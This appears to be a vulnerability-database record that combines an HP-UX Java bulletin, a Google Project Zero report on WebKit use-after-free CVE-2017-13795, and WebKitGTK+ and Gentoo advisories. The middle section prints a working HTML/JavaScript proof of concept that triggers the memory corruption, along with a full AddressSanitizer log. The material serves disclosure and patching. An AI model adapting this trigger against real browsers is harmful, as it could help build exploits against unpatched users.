CVE-2013-0432 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4
CVE-2013-0433 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2013-0434 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2013-0435 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0
CVE-2013-0438 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3
CVE-2013-0440 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0
CVE-2013-0441 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0442 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0443 (AV:N/AC:H/Au:N/C:P/I:P/A:N) 4.0
CVE-2013-0445 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0446 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0450 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-0809 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1473 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0
CVE-2013-1475 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1476 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1478 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1480 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1481 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
CVE-2013-1493 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0
===========================================================
Information on CVSS is documented
in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided the following Java version upgrade to resolve these
vulnerabilities.
The upgrade is available from the following location
http://www.hp.com/java
OS Version
Release Version
HP-UX B.11.11, B.11.23, B.11.31
JDK and JRE v6.0.18 or subsequent
MANUAL ACTIONS: Yes - Update
For Java v6.0 update to Java v6.0.18 or subsequent
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application
that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins
issued by HP and lists recommended actions that may apply to a specific HP-UX
system. It can also download patches and create a depot automatically. For
more information see https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant.
AFFECTED VERSIONS
HP-UX B.11.11
HP-UX B.11.23
===========
Jdk60.JDK60-COM
Jdk60.JDK60-PA20
Jdk60.JDK60-PA20W
Jre60.JRE60-COM
Jre60.JRE60-COM-DOC
Jre60.JRE60-PA20
Jre60.JRE60-PA20-HS
Jre60.JRE60-PA20W
Jre60.JRE60-PA20W-HS
Jdk60.JDK60-IPF32
Jdk60.JDK60-IPF64
Jre60.JRE60-COM
Jre60.JRE60-IPF32
Jre60.JRE60-IPF32-HS
Jre60.JRE60-IPF64
Jre60.JRE60-IPF64-HS
action: install revision 1.6.0.18.00 or subsequent
HP-UX B.11.23
HP-UX B.11.31
===========
Jdk60.JDK60-COM
Jdk60.JDK60-IPF32
Jdk60.JDK60-IPF64
Jre60.JRE60-IPF32
Jre60.JRE60-IPF32-HS
Jre60.JRE60-IPF64
Jre60.JRE60-IPF64-HS
Jre60.JRE60-COM
Jre60.JRE60-IPF32
Jre60.JRE60-IPF32-HS
Jre60.JRE60-IPF64
Jre60.JRE60-IPF64-HS
action: install revision 1.6.0.18.00 or subsequent
END AFFECTED VERSIONS
HISTORY
Version:1 (rev.1) - 3 April 2013 Initial release
Third Party Security Patches: Third party security patches that are to be
installed on systems running HP software products should be applied in
accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HP Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported
product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin
alerts via Email:
http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin List: A list of HP Security Bulletins, updated
periodically, is contained in HP Security Notice HPSN-2011-001:
https://h20566.www2.hp.com/portal/site/hpsc/public/kb/
docDisplay?docId=emr_na-c02964430
Security Bulletin Archive: A list of recently released Security Bulletins is
available here:
http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX
Copyright 2013 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors
or omissions contained herein. The information provided is provided "as is"
without warranty of any kind. To the extent permitted by law, neither HP or
its affiliates, subcontractors or suppliers will be liable for
incidental,special or consequential damages including downtime cost; lost
profits;damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners |
|
var-201711-0447
|
An issue was discovered in certain Apple products. iOS before 11.1 is affected. Safari before 11.0.1 is affected. iCloud before 7.1 on Windows is affected. iTunes before 12.7.1 on Windows is affected. tvOS before 11.1 is affected. The issue involves the "WebKit" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site. Apple iOS, iCloud for Windows, iTunes for Windows, Safari, and tvOS are all products of the American company Apple (Apple). Apple iOS is an operating system developed for mobile devices; Safari is a web browser that comes with the Mac OS X and iOS operating systems by default. WebKit is an open source web browser engine developed by the KDE community and is currently used by browsers such as Apple Safari and Google Chrome. WebKit: use-after-free in WebCore::AXObjectCache::performDeferredCacheUpdate
CVE-2017-13795
There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly.
Note that accessibility features need to be enabled in order to trigger this bug. On Safari on Mac this can be accomplished by opening the inspector (simply opening the inspector enables accessibility features). On WebKitGTK+ (and possibly other WebKit releases) accessibility features are enabled by default.
PoC:
=================================================================
<style>
#colgrp { display: table-footer-group; }
.class1 { text-transform: capitalize; display: -webkit-box; }
</style>
<script>
function go() {
textarea.setSelectionRange(30,1);
option.defaultSelected = true;
col.setAttribute("aria-labeledby", "link");
}
</script>
<body onload=go()>
<link id="link">
<table>
<colgroup id="colgrp">
<col id="col" tabindex="1"></col>
<thead class="class1">
<th class="class1">
<textarea id="textarea" readonly="readonly"></textarea>
<option id="option"></option>
=================================================================
ASan log:
=================================================================
==30369==ERROR: AddressSanitizer: heap-use-after-free on address 0x603000346940 at pc 0x000113012178 bp 0x7fff563cac80 sp 0x7fff563cac78
READ of size 8 at 0x603000346940 thread T0
==30369==WARNING: invalid path to external symbolizer!
==30369==WARNING: Failed to use and restart external symbolizer!
#0 0x113012177 in WTF::ListHashSetConstIterator<WebCore::Node*, WTF::PtrHash<WebCore::Node*> >::operator++() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1f3177)
#1 0x112ff326d in WTF::ListHashSetIterator<WebCore::Node*, WTF::PtrHash<WebCore::Node*> >::operator++() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d426d)
#2 0x113007cf2 in WebCore::AXObjectCache::performDeferredCacheUpdate() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1e8cf2)
#3 0x115dcb242 in WebCore::ThreadTimers::sharedTimerFiredInternal() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2fac242)
#4 0x114f89e74 in WebCore::timerFired(__CFRunLoopTimer*, void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x216ae74)
#5 0x7fffd5298c53 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_TIMER_CALLBACK_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x90c53)
#6 0x7fffd52988de in __CFRunLoopDoTimer (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x908de)
#7 0x7fffd5298439 in __CFRunLoopDoTimers (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x90439)
#8 0x7fffd528fb80 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87b80)
#9 0x7fffd528f113 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87113)
#10 0x7fffd47efebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb)
#11 0x7fffd47efcf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0)
#12 0x7fffd47efb25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25)
#13 0x7fffd2d88a53 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46a53)
#14 0x7fffd35047ed in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c27ed)
#15 0x7fffd2d7d3da in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b3da)
#16 0x7fffd2d47e0d in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x5e0d)
#17 0x7fffeac688c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6)
#18 0x7fffeac672e3 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf2e3)
#19 0x10983356c in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x10000156c)
#20 0x7fffeaa0f234 in start (/usr/lib/system/libdyld.dylib:x86_64+0x5234)
0x603000346940 is located 16 bytes inside of 24-byte region [0x603000346930,0x603000346948)
freed by thread T0 here:
#0 0x10ca9c294 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x57294)
#1 0x11ffee650 in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d72650)
#2 0x11300fccb in WTF::ListHashSet<WebCore::Node*, WTF::PtrHash<WebCore::Node*> >::deleteAllNodes() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1f0ccb)
#3 0x113007edd in WTF::ListHashSet<WebCore::Node*, WTF::PtrHash<WebCore::Node*> >::clear() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1e8edd)
#4 0x113007d30 in WebCore::AXObjectCache::performDeferredCacheUpdate() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1e8d30)
#5 0x1139a3d4a in WebCore::FrameView::layout(bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb84d4a)
#6 0x1135afb10 in WebCore::Document::updateLayout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x790b10)
#7 0x1135b6542 in WebCore::Document::updateLayoutIgnorePendingStylesheets(WebCore::Document::RunPostLayoutTasks) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x797542)
#8 0x1137764b1 in WebCore::Element::innerText() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9574b1)
#9 0x112e437cc in WebCore::accessibleNameForNode(WebCore::Node*, WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x247cc)
#10 0x112e47a63 in WebCore::AccessibilityNodeObject::accessibilityDescriptionForElements(WTF::Vector<WebCore::Element*, 0ul, WTF::CrashOnOverflow, 16ul>&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28a63)
#11 0x112e47dce in WebCore::AccessibilityNodeObject::ariaLabeledByAttribute() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28dce)
#12 0x112e40a59 in WebCore::AccessibilityNodeObject::ariaAccessibilityDescription() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x21a59)
#13 0x112e47eec in WebCore::AccessibilityNodeObject::hasAttributesRequiredForInclusion() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28eec)
#14 0x112e79f53 in WebCore::AccessibilityRenderObject::computeAccessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x5af53)
#15 0x112e613eb in WebCore::AccessibilityObject::accessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x423eb)
#16 0x112ff54b1 in WebCore::AXObjectCache::getOrCreate(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d64b1)
#17 0x112ff377f in WebCore::AXObjectCache::getOrCreate(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d477f)
#18 0x112ff8bbd in WebCore::AXObjectCache::textChanged(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d9bbd)
#19 0x113007cea in WebCore::AXObjectCache::performDeferredCacheUpdate() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1e8cea)
#20 0x115dcb242 in WebCore::ThreadTimers::sharedTimerFiredInternal() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2fac242)
#21 0x114f89e74 in WebCore::timerFired(__CFRunLoopTimer*, void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x216ae74)
#22 0x7fffd5298c53 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_TIMER_CALLBACK_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x90c53)
#23 0x7fffd52988de in __CFRunLoopDoTimer (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x908de)
#24 0x7fffd5298439 in __CFRunLoopDoTimers (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x90439)
#25 0x7fffd528fb80 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87b80)
#26 0x7fffd528f113 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x87113)
#27 0x7fffd47efebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb)
#28 0x7fffd47efcf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0)
#29 0x7fffd47efb25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25)
previously allocated by thread T0 here:
#0 0x10ca9bd2c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c)
#1 0x7fffeab91281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281)
#2 0x11ffeead4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d72ad4)
#3 0x11ffecd6d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1d70d6d)
#4 0x11ff73247 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1cf7247)
#5 0x11ff7263a in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1cf663a)
#6 0x113011c38 in WTF::ListHashSetNode<WebCore::Node*>::operator new(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1f2c38)
#7 0x113020d79 in void WTF::ListHashSetTranslator<WTF::PtrHash<WebCore::Node*> >::translate<WTF::ListHashSetNode<WebCore::Node*>, WebCore::Node* const&, std::nullptr_t>(WTF::ListHashSetNode<WebCore::Node*>*&, WebCore::Node* const&&&, std::nullptr_t&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x201d79)
#8 0x112ffbec9 in WTF::ListHashSet<WebCore::Node*, WTF::PtrHash<WebCore::Node*> >::add(WebCore::Node* const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dcec9)
#9 0x112ffb785 in WebCore::AXObjectCache::deferTextChangedIfNeeded(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dc785)
#10 0x11376c58e in WebCore::Element::attributeChanged(WebCore::QualifiedName const&, WTF::AtomicString const&, WTF::AtomicString const&, WebCore::Element::AttributeModificationReason) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x94d58e)
#11 0x11377298d in WebCore::Element::didAddAttribute(WebCore::QualifiedName const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x95398d)
#12 0x1137727a1 in WebCore::Element::addAttributeInternal(WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9537a1)
#13 0x11376bf12 in WebCore::Element::setAttributeInternal(unsigned int, WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x94cf12)
#14 0x11376bd0b in WebCore::Element::setAttribute(WTF::AtomicString const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x94cd0b)
#15 0x114443e31 in WebCore::jsElementPrototypeFunctionSetAttributeBody(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1624e31)
#16 0x1144392e8 in long long WebCore::IDLOperation<WebCore::JSElement>::call<&(WebCore::jsElementPrototypeFunctionSetAttributeBody(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState&, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x161a2e8)
#17 0x3c5768201027 (<unknown module>)
#18 0x11f926e49 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16aae49)
#19 0x11f926e49 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16aae49)
#20 0x11f91ff6f in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x16a3f6f)
#21 0x11f583847 in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1307847)
#22 0x11f50488a in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x128888a)
#23 0x11eb1d731 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a1731)
#24 0x11eb1d9a2 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a19a2)
#25 0x11eb1dd13 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x8a1d13)
#26 0x11405d615 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x123e615)
#27 0x1144706cd in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext&, WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x16516cd)
#28 0x1137dc010 in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener>, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9bd010)
#29 0x1137dbae0 in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9bcae0)
SUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1f3177) in WTF::ListHashSetConstIterator<WebCore::Node*, WTF::PtrHash<WebCore::Node*> >::operator++()
Shadow bytes around the buggy address:
0x1c0600068cd0: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd
0x1c0600068ce0: fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa
0x1c0600068cf0: fd fd fd fa fa fa fd fd fd fa fa fa fd fd fd fa
0x1c0600068d00: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd
0x1c0600068d10: fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa
=>0x1c0600068d20: fd fd fd fa fa fa fd fd[fd]fa fa fa 00 00 00 02
0x1c0600068d30: fa fa 00 00 00 01 fa fa 00 00 06 fa fa fa fd fd
0x1c0600068d40: fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa
0x1c0600068d50: fd fd fd fa fa fa fd fd fd fa fa fa fd fd fd fa
0x1c0600068d60: fa fa fd fd fd fa fa fa fd fd fd fa fa fa fd fd
0x1c0600068d70: fd fa fa fa fd fd fd fa fa fa fd fd fd fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==30369==ABORTING
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.
Found by: ifratric
. ------------------------------------------------------------------------
WebKitGTK+ Security Advisory WSA-2017-0009
------------------------------------------------------------------------
Date reported : November 10, 2017
Advisory ID : WSA-2017-0009
Advisory URL : https://webkitgtk.org/security/WSA-2017-0009.html
CVE identifiers : CVE-2017-13783, CVE-2017-13784, CVE-2017-13785,
CVE-2017-13788, CVE-2017-13791, CVE-2017-13792,
CVE-2017-13793, CVE-2017-13794, CVE-2017-13795,
CVE-2017-13796, CVE-2017-13798, CVE-2017-13802,
CVE-2017-13803.
Several vulnerabilities were discovered in WebKitGTK+.
Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption
issues were addressed with improved memory handling.
Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption
issues were addressed with improved memory handling.
Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption
issues were addressed with improved memory handling.
Credit to xisigr of Tencent's Xuanwu Lab (tencent.com). Description: Multiple memory corruption
issues were addressed with improved memory handling.
Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption
issues were addressed with improved memory handling.
Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption
issues were addressed with improved memory handling.
Credit to Hanul Choi working with Trend Micro's Zero Day Initiative. Description: Multiple memory corruption
issues were addressed with improved memory handling.
Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption
issues were addressed with improved memory handling.
Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption
issues were addressed with improved memory handling.
Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption
issues were addressed with improved memory handling.
Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption
issues were addressed with improved memory handling.
Credit to Ivan Fratric of Google Project Zero. Description: Multiple memory corruption
issues were addressed with improved memory handling.
Credit to chenqin (ee|) of Ant-financial Light-Year Security. Description: Multiple memory corruption
issues were addressed with improved memory handling.
We recommend updating to the last stable version of WebKitGTK+. It is
the best way of ensuring that you are running a safe version of
WebKitGTK+. Please check our website for information about the last
stable releases.
Further information about WebKitGTK+ Security Advisories can be found
at: https://webkitgtk.org/security.html
The WebKitGTK+ team,
November 10, 2017
. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201712-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
https://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: WebKitGTK+: Multiple vulnerabilities
Date: December 14, 2017
Bugs: #637076
ID: 201712-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been discovered in WebKitGTK+, the worst
of which may lead to arbitrary code execution.
Background
==========
WebKitGTK+ is a full-featured port of the WebKit rendering engine,
suitable for projects requiring any kind of web integration, from
hybrid HTML/CSS applications to full-fledged web browsers.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-libs/webkit-gtk < 2.18.3 >= 2.18.3
Description
===========
Multiple vulnerabilities have been discovered in WebKitGTK+. Please
review the referenced CVE identifiers for details.
Workaround
==========
There are no known workarounds at this time.
Resolution
==========
All WebKitGTK+ users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-libs/webkit-gtk-2.18.3"
References
==========
[ 1 ] CVE-2017-13783
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13783
[ 2 ] CVE-2017-13784
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-13784
[ 3 ] CVE-2017-13785
